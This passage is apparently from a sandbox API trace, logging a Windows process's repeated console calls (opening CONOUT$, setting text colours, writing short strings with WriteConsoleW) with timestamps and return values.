	[0059.817] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43
	[0059.873] GetLastError () returned 0xcb
	[0059.873] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x43, lpConsoleScreenBufferInfo=0x55fe808 | out: lpConsoleScreenBufferInfo=0x55fe808) returned 1
	[0059.874] GetLastError () returned 0xcb
	[0059.879] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47
	[0059.879] GetLastError () returned 0xcb
	[0059.879] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x55fe810 | out: lpConsoleScreenBufferInfo=0x55fe810) returned 1
	[0059.879] GetLastError () returned 0xcb
	[0059.879] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0xc) returned 1
	[0059.973] GetLastError () returned 0xcb
	[0059.973] CloseHandle (hObject=0x47) returned 1
	[0059.974] GetLastError () returned 0xcb
	[0059.979] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47
	[0059.979] GetLastError () returned 0xcb
	[0059.979] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x55fe810 | out: lpConsoleScreenBufferInfo=0x55fe810) returned 1
	[0059.979] GetLastError () returned 0xcb
	[0059.979] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0xc) returned 1
	[0059.980] GetLastError () returned 0xcb
	[0059.980] CloseHandle (hObject=0x47) returned 1
	[0059.980] GetLastError () returned 0xcb
	[0059.985] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47
	[0059.985] GetLastError () returned 0xcb
	[0059.985] GetConsoleMode (in: hConsoleHandle=0x47, lpMode=0x55fe85c | out: lpMode=0x55fe85c) returned 1
	[0059.985] GetLastError () returned 0xcb
	[0059.985] WriteConsoleW (in: hConsoleOutput=0x47, lpBuffer=0x21cd1cc*, nNumberOfCharsToWrite=0x11, lpNumberOfCharsWritten=0x55fe85c, lpReserved=0x0 | out: lpBuffer=0x21cd1cc*, lpNumberOfCharsWritten=0x55fe85c*=0x11) returned 1
	[0059.986] GetLastError () returned 0xcb
	[0059.986] CloseHandle (hObject=0x47) returned 1
	[0059.986] GetLastError () returned 0xcb
	[0059.990] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47
	[0059.991] GetLastError () returned 0xcb
	[0059.991] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x55fe80c | out: lpConsoleScreenBufferInfo=0x55fe80c) returned 1
	[0059.991] GetLastError () returned 0xcb
	[0059.991] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0x7) returned 1
	[0059.991] GetLastError () returned 0xcb
	[0059.991] CloseHandle (hObject=0x47) returned 1
	[0059.991] GetLastError () returned 0xcb
	[0059.996] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47
	[0059.996] GetLastError () returned 0xcb
	[0059.996] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x55fe80c | out: lpConsoleScreenBufferInfo=0x55fe80c) returned 1
	[0059.996] GetLastError () returned 0xcb
	[0059.996] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0x7) returned 1
	[0059.996] GetLastError () returned 0xcb
	[0059.996] CloseHandle (hObject=0x47) returned 1
	[0059.997] GetLastError () returned 0xcb
	[0060.001] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47
	[0060.001] GetLastError () returned 0xcb
	[0060.001] GetConsoleMode (in: hConsoleHandle=0x47, lpMode=0x55fe89c | out: lpMode=0x55fe89c) returned 1
	[0060.001] GetLastError () returned 0xcb
	[0060.001] WriteConsoleW (in: hConsoleOutput=0x47, lpBuffer=0x1f19938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x55fe89c, lpReserved=0x0 | out: lpBuffer=0x1f19938*, lpNumberOfCharsWritten=0x55fe89c*=0x1) returned 1
	[0060.001] GetLastError () returned 0xcb
	[0060.002] CloseHandle (hObject=0x47) returned 1
	[0060.002] GetLastError () returned 0xcb
	[0060.006] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47
	[0060.006] GetLastError () returned 0xcb
	[0060.006] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x55fe868 | out: lpConsoleScreenBufferInfo=0x55fe868) returned 1
	[0060.006] GetLastError () returned 0xcb
	[0060.006] GetConsoleOutputCP () returned 0x1b5
	[0060.006] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0060.006] GetLastError () returned 0xcb
	[0060.010] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4b
	[0060.062] GetLastError () returned 0xcb
	[0060.062] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x4b, lpConsoleScreenBufferInfo=0x55fe808 | out: lpConsoleScreenBufferInfo=0x55fe808) returned 1
	[0060.062] GetLastError () returned 0xcb
	[0060.067] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4f
	[0060.067] GetLastError () returned 0xcb
	[0060.068] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x4f, lpConsoleScreenBufferInfo=0x55fe808 | out: lpConsoleScreenBufferInfo=0x55fe808) returned 1
	[0060.068] GetLastError () returned 0xcb
	[0060.072] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53
	[0060.072] GetLastError () returned 0xcb
	[0060.072] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x55fe810 | out: lpConsoleScreenBufferInfo=0x55fe810) returned 1
	[0060.072] GetLastError () returned 0xcb
	[0060.072] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0xc) returned 1
	[0060.072] GetLastError () returned 0xcb
	[0060.072] CloseHandle (hObject=0x53) returned 1
	[0060.073] GetLastError () returned 0xcb
	[0060.077] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53
	[0060.077] GetLastError () returned 0xcb
	[0060.077] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x55fe810 | out: lpConsoleScreenBufferInfo=0x55fe810) returned 1
	[0060.077] GetLastError () returned 0xcb
	[0060.077] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0xc) returned 1
	[0060.077] GetLastError () returned 0xcb
	[0060.078] CloseHandle (hObject=0x53) returned 1
	[0060.078] GetLastError () returned 0xcb
	[0060.082] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53
	[0060.082] GetLastError () returned 0xcb
	[0060.082] GetConsoleMode (in: hConsoleHandle=0x53, lpMode=0x55fe85c | out: lpMode=0x55fe85c) returned 1
	[0060.082] GetLastError () returned 0xcb
	[0060.082] WriteConsoleW (in: hConsoleOutput=0x53, lpBuffer=0x21cd544*, nNumberOfCharsToWrite=0x39, lpNumberOfCharsWritten=0x55fe85c, lpReserved=0x0 | out: lpBuffer=0x21cd544*, lpNumberOfCharsWritten=0x55fe85c*=0x39) returned 1
	[0060.082] GetLastError () returned 0xcb
	[0060.083] CloseHandle (hObject=0x53) returned 1
	[0060.083] GetLastError () returned 0xcb
	[0060.087] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53
	[0060.087] GetLastError () returned 0xcb
	[0060.087] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x55fe80c | out: lpConsoleScreenBufferInfo=0x55fe80c) returned 1
	[0060.087] GetLastError () returned 0xcb
	[0060.087] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0x7) returned 1
	[0060.087] GetLastError () returned 0xcb
	[0060.088] CloseHandle (hObject=0x53) returned 1
	[0060.088] GetLastError () returned 0xcb
	[0060.092] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53
	[0060.092] GetLastError () returned 0xcb
	[0060.092] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x55fe80c | out: lpConsoleScreenBufferInfo=0x55fe80c) returned 1
	[0060.092] GetLastError () returned 0xcb
	[0060.093] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0x7) returned 1
	[0060.093] GetLastError () returned 0xcb
	[0060.093] CloseHandle (hObject=0x53) returned 1
	[0060.093] GetLastError () returned 0xcb
	[0060.097] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53
	[0060.139] GetLastError () returned 0xcb
	[0060.139] GetConsoleMode (in: hConsoleHandle=0x53, lpMode=0x55fe89c | out: lpMode=0x55fe89c) returned 1
	[0060.139] GetLastError () returned 0xcb
	[0060.139] WriteConsoleW (in: hConsoleOutput=0x53, lpBuffer=0x1f19938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x55fe89c, lpReserved=0x0 | out: lpBuffer=0x1f19938*, lpNumberOfCharsWritten=0x55fe89c*=0x1) returned 1
	[0060.139] GetLastError () returned 0xcb
	[0060.139] CloseHandle (hObject=0x53) returned 1
	[0060.140] GetLastError () returned 0xcb
	[0060.144] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53
	[0060.145] GetLastError () returned 0xcb
	[0060.145] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x55fe868 | out: lpConsoleScreenBufferInfo=0x55fe868) returned 1
	[0060.145] GetLastError () returned 0xcb
	[0060.145] GetConsoleOutputCP () returned 0x1b5
	[0060.145] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0060.145] GetLastError () returned 0xcb
	[0060.149] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x57
	[0060.149] GetLastError () returned 0xcb
	[0060.149] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x57, lpConsoleScreenBufferInfo=0x55fe808 | out: lpConsoleScreenBufferInfo=0x55fe808) returned 1
	[0060.150] GetLastError () returned 0xcb
	[0060.155] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b
	[0060.156] GetLastError () returned 0xcb
	[0060.156] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5b, lpConsoleScreenBufferInfo=0x55fe808 | out: lpConsoleScreenBufferInfo=0x55fe808) returned 1
	[0060.156] GetLastError () returned 0xcb
	[0060.164] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f
	[0060.165] GetLastError () returned 0xcb
	[0060.165] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x55fe810 | out: lpConsoleScreenBufferInfo=0x55fe810) returned 1
	[0060.165] GetLastError () returned 0xcb
	[0060.165] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0xc) returned 1
	[0060.165] GetLastError () returned 0xcb
	[0060.165] CloseHandle (hObject=0x5f) returned 1
	[0060.166] GetLastError () returned 0xcb
	[0060.170] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f
	[0060.170] GetLastError () returned 0xcb
	[0060.170] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x55fe810 | out: lpConsoleScreenBufferInfo=0x55fe810) returned 1
	[0060.170] GetLastError () returned 0xcb
	[0060.171] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0xc) returned 1
	[0060.171] GetLastError () returned 0xcb
	[0060.171] CloseHandle (hObject=0x5f) returned 1
	[0060.171] GetLastError () returned 0xcb
	[0060.173] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f
	[0060.263] GetLastError () returned 0xcb
	[0060.263] GetConsoleMode (in: hConsoleHandle=0x5f, lpMode=0x55fe85c | out: lpMode=0x55fe85c) returned 1
	[0060.264] GetLastError () returned 0xcb
	[0060.264] WriteConsoleW (in: hConsoleOutput=0x5f, lpBuffer=0x21cda30*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x55fe85c, lpReserved=0x0 | out: lpBuffer=0x21cda30*, lpNumberOfCharsWritten=0x55fe85c*=0x4f) returned 1
	[0060.264] GetLastError () returned 0xcb
	[0060.264] CloseHandle (hObject=0x5f) returned 1
	[0060.264] GetLastError () returned 0xcb
	[0060.268] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f
	[0060.268] GetLastError () returned 0xcb
	[0060.268] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x55fe80c | out: lpConsoleScreenBufferInfo=0x55fe80c) returned 1
	[0060.268] GetLastError () returned 0xcb
	[0060.268] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0x7) returned 1
	[0060.268] GetLastError () returned 0xcb
	[0060.268] CloseHandle (hObject=0x5f) returned 1
	[0060.268] GetLastError () returned 0xcb
	[0060.271] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f
	[0060.271] GetLastError () returned 0xcb
	[0060.271] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x55fe80c | out: lpConsoleScreenBufferInfo=0x55fe80c) returned 1
	[0060.271] GetLastError () returned 0xcb
	[0060.271] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0x7) returned 1
	[0060.271] GetLastError () returned 0xcb
	[0060.272] CloseHandle (hObject=0x5f) returned 1
	[0060.272] GetLastError () returned 0xcb
	[0060.274] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f
	[0060.274] GetLastError () returned 0xcb
	[0060.274] GetConsoleMode (in: hConsoleHandle=0x5f, lpMode=0x55fe89c | out: lpMode=0x55fe89c) returned 1
	[0060.274] GetLastError () returned 0xcb
	[0060.275] WriteConsoleW (in: hConsoleOutput=0x5f, lpBuffer=0x1f19938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x55fe89c, lpReserved=0x0 | out: lpBuffer=0x1f19938*, lpNumberOfCharsWritten=0x55fe89c*=0x1) returned 1
	[0060.275] GetLastError () returned 0xcb
	[0060.275] CloseHandle (hObject=0x5f) returned 1
	[0060.275] GetLastError () returned 0xcb
	[0060.277] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f
	[0060.278] GetLastError () returned 0xcb
	[0060.278] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x55fe868 | out: lpConsoleScreenBufferInfo=0x55fe868) returned 1
	[0060.278] GetLastError () returned 0xcb
	[0060.278] GetConsoleOutputCP () returned 0x1b5
	[0060.278] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0060.278] GetLastError () returned 0xcb
	[0060.280] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x63
	[0060.281] GetLastError () returned 0xcb
	[0060.281] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x63, lpConsoleScreenBufferInfo=0x55fe808 | out: lpConsoleScreenBufferInfo=0x55fe808) returned 1
	[0060.281] GetLastError () returned 0xcb
	[0060.283] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x67
	[0060.283] GetLastError () returned 0xcb
	[0060.283] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x67, lpConsoleScreenBufferInfo=0x55fe808 | out: lpConsoleScreenBufferInfo=0x55fe808) returned 1
	[0060.283] GetLastError () returned 0xcb
	[0060.286] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b
	[0060.286] GetLastError () returned 0xcb
	[0060.286] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x55fe810 | out: lpConsoleScreenBufferInfo=0x55fe810) returned 1
	[0060.286] GetLastError () returned 0xcb
	[0060.286] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0xc) returned 1
	[0060.286] GetLastError () returned 0xcb
	[0060.286] CloseHandle (hObject=0x6b) returned 1
	[0060.287] GetLastError () returned 0xcb
	[0060.289] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b
	[0060.289] GetLastError () returned 0xcb
	[0060.289] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x55fe810 | out: lpConsoleScreenBufferInfo=0x55fe810) returned 1
	[0060.289] GetLastError () returned 0xcb
	[0060.289] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0xc) returned 1
	[0060.289] GetLastError () returned 0xcb
	[0060.290] CloseHandle (hObject=0x6b) returned 1
	[0060.290] GetLastError () returned 0xcb
	[0060.292] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b
	[0060.292] GetLastError () returned 0xcb
	[0060.292] GetConsoleMode (in: hConsoleHandle=0x6b, lpMode=0x55fe85c | out: lpMode=0x55fe85c) returned 1
	[0060.293] GetLastError () returned 0xcb
	[0060.293] WriteConsoleW (in: hConsoleOutput=0x6b, lpBuffer=0x21cdf0c*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x55fe85c, lpReserved=0x0 | out: lpBuffer=0x21cdf0c*, lpNumberOfCharsWritten=0x55fe85c*=0x19) returned 1
	[0060.293] GetLastError () returned 0xcb
	[0060.293] CloseHandle (hObject=0x6b) returned 1
	[0060.293] GetLastError () returned 0xcb
	[0060.295] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b
	[0060.296] GetLastError () returned 0xcb
	[0060.296] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x55fe80c | out: lpConsoleScreenBufferInfo=0x55fe80c) returned 1
	[0060.296] GetLastError () returned 0xcb
	[0060.296] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0x7) returned 1
	[0060.296] GetLastError () returned 0xcb
	[0060.296] CloseHandle (hObject=0x6b) returned 1
	[0060.296] GetLastError () returned 0xcb
	[0060.299] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b
	[0060.357] GetLastError () returned 0xcb
	[0060.357] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x55fe80c | out: lpConsoleScreenBufferInfo=0x55fe80c) returned 1
	[0060.358] GetLastError () returned 0xcb
	[0060.358] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0x7) returned 1
	[0060.358] GetLastError () returned 0xcb
	[0060.358] CloseHandle (hObject=0x6b) returned 1
	[0060.358] GetLastError () returned 0xcb
	[0060.362] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b
	[0060.362] GetLastError () returned 0xcb
	[0060.362] GetConsoleMode (in: hConsoleHandle=0x6b, lpMode=0x55fe89c | out: lpMode=0x55fe89c) returned 1
	[0060.362] GetLastError () returned 0xcb
	[0060.362] WriteConsoleW (in: hConsoleOutput=0x6b, lpBuffer=0x1f19938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x55fe89c, lpReserved=0x0 | out: lpBuffer=0x1f19938*, lpNumberOfCharsWritten=0x55fe89c*=0x1) returned 1
	[0060.362] GetLastError () returned 0xcb
	[0060.362] CloseHandle (hObject=0x6b) returned 1
	[0060.362] GetLastError () returned 0xcb
	[0060.365] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b
	[0060.365] GetLastError () returned 0xcb
	[0060.365] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x55fe868 | out: lpConsoleScreenBufferInfo=0x55fe868) returned 1
	[0060.365] GetLastError () returned 0xcb
	[0060.365] GetConsoleOutputCP () returned 0x1b5
	[0060.365] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0060.365] GetLastError () returned 0xcb
	[0060.368] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6f
	[0060.368] GetLastError () returned 0xcb
	[0060.368] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6f, lpConsoleScreenBufferInfo=0x55fe808 | out: lpConsoleScreenBufferInfo=0x55fe808) returned 1
	[0060.368] GetLastError () returned 0xcb
	[0060.370] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x73
	[0060.371] GetLastError () returned 0xcb
	[0060.371] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x73, lpConsoleScreenBufferInfo=0x55fe808 | out: lpConsoleScreenBufferInfo=0x55fe808) returned 1
	[0060.371] GetLastError () returned 0xcb
	[0060.373] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77
	[0060.374] GetLastError () returned 0xcb
	[0060.374] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x55fe810 | out: lpConsoleScreenBufferInfo=0x55fe810) returned 1
	[0060.374] GetLastError () returned 0xcb
	[0060.374] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0xc) returned 1
	[0060.374] GetLastError () returned 0xcb
	[0060.374] CloseHandle (hObject=0x77) returned 1
	[0060.374] GetLastError () returned 0xcb
	[0060.377] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77
	[0060.377] GetLastError () returned 0xcb
	[0060.377] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x55fe810 | out: lpConsoleScreenBufferInfo=0x55fe810) returned 1
	[0060.377] GetLastError () returned 0xcb
	[0060.377] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0xc) returned 1
	[0060.377] GetLastError () returned 0xcb
	[0060.377] CloseHandle (hObject=0x77) returned 1
	[0060.378] GetLastError () returned 0xcb
	[0060.380] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77
	[0060.380] GetLastError () returned 0xcb
	[0060.380] GetConsoleMode (in: hConsoleHandle=0x77, lpMode=0x55fe85c | out: lpMode=0x55fe85c) returned 1
	[0060.380] GetLastError () returned 0xcb
	[0060.380] WriteConsoleW (in: hConsoleOutput=0x77, lpBuffer=0x21ce2a4*, nNumberOfCharsToWrite=0x36, lpNumberOfCharsWritten=0x55fe85c, lpReserved=0x0 | out: lpBuffer=0x21ce2a4*, lpNumberOfCharsWritten=0x55fe85c*=0x36) returned 1
	[0060.381] GetLastError () returned 0xcb
	[0060.381] CloseHandle (hObject=0x77) returned 1
